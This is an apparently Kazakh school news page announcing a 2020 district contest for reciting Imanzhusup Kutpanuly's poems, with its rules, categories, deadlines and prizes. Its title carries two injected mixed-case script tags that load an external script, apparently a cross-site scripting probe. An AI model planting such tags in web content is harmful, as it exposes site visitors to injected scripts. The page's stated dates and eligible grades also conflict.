И.Құтпанұлының өлеңдерін мәнерлеп оқу<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.11.2020

Иманжүсіп Құтпанұлының шығармасын насихаттау мақсатында аудан көлемінде И.Құтпанұлының өлеңдерін мәнерлеп оқу ұйымдастырылды. Қатысушылардың нәтижелері 16 қарашада белгілі болады.

 

Аудандық «Даланың дара дүлділі»

 Иманжүсіп оқуларының Ережелері 

Мақсаты: Оқушылар арасында Иманжүсіп Құтпанұлы шығармашылығын насихаттау,  аудан көлемінде дарынды оқушыларды анықтау, ынталандыру.

Қатысушылар: 7-11 сынып оқушылары

Қатысушы жұмыстарын қабылдау мерзімі: 19 қазан  мен - 10 қараша аралығы, 2020 жыл.

Қорытынды уақыты: 12 қараша  2020 жыл

Ұйымдастырушы: Аршалы аудандық білім бөлімі, Иманжүсіп Құтпанұлы атындағы орта мектебі

1. Байқау бағыттары мен тапсырмалары:

1. «Ақынмен сырласу!» (И. Құтпанұлы өлеңдерін мәнерлеп оқу видео форматында);

2. «Сайра тілім!» (И. Құтпанұлына өз шығармашылығынан арнау өлеңдер видео форматында);

3. «Ән қанатында!» (И. Құтпанұлы әндерін орындау видео форматында);

4. «Иманжүсіп әлемі» (И. Құтпанұлының шығармашылығына арналған эссе, шығарма, зерттеу жұмыстары, мақала)

Байқауға жұмыстар қазақ, орыс мектептерінен  қабылданады. (Интернеттен көшірілген материалдар қабылданбайды.)

2. Байқауға қатысушылар:

*Бірінші жас санаты: 5-7 сынып оқушылары;

*Екінші жас санаты: 8-11 сынып оқушылары.

3. Байқауды өткізу мерзімі мен тәртібі:

Байқау жұмыстары 2020 жылдың 12 қазанынан бастап 4 қарашасына дейін қабылданады. Байқауға ұсынылған жұмыстар тақырыпқа сай болуы тиіс. Жұмыстарды imanzhusup_kutpanyli@mail.ru электронды поштасына жіберу керек.

4. Бағалау өлшемдері:

1. Шығарманы оқу мәнерлігі;

2. Ақындық қабілетінің асқақтығы;

3. Әнді орындау шеберлігі;

4. Мәтіннің көркемдік құрылымы, тіл байлығы.

     Видео  түсіру сапасы, киім талғамы, артқы фонның лайықтылығы ескеріледі.

5.Қорытынды:

Жеңімпаздар - Бас жүлде – Иманжүсіп Құтпанұлының арнайы кубогі мен дипломымен  әр бағыт бойынша, I, II, III  дәрежелі дипломдармен  марапатталады. Орын алмаған оқушыларға сертификаттар  беріледі. Жеңімпаз оқушылардың  жетекшісілеріне алғыс хат беріледі.

Қосымша сұрақ бойынша :

Байланыс телефондары:  87012876076 (Сулушаш Турсынгалиевна),

                                            87778176520 (Амина Кумарбековна)

Қосымша 1

Байқауға қатысуға сұраныс үлгісі

 

№

Қатысушының аты-жөні

Мектебі

Сыныбы

Байқау номинациясы

Жетекшісінің аты-жөні

 

 

 

 

 

 

 

 

Просмотров: 495


Пікір қосу



Деректерді қолтаңбаға қосу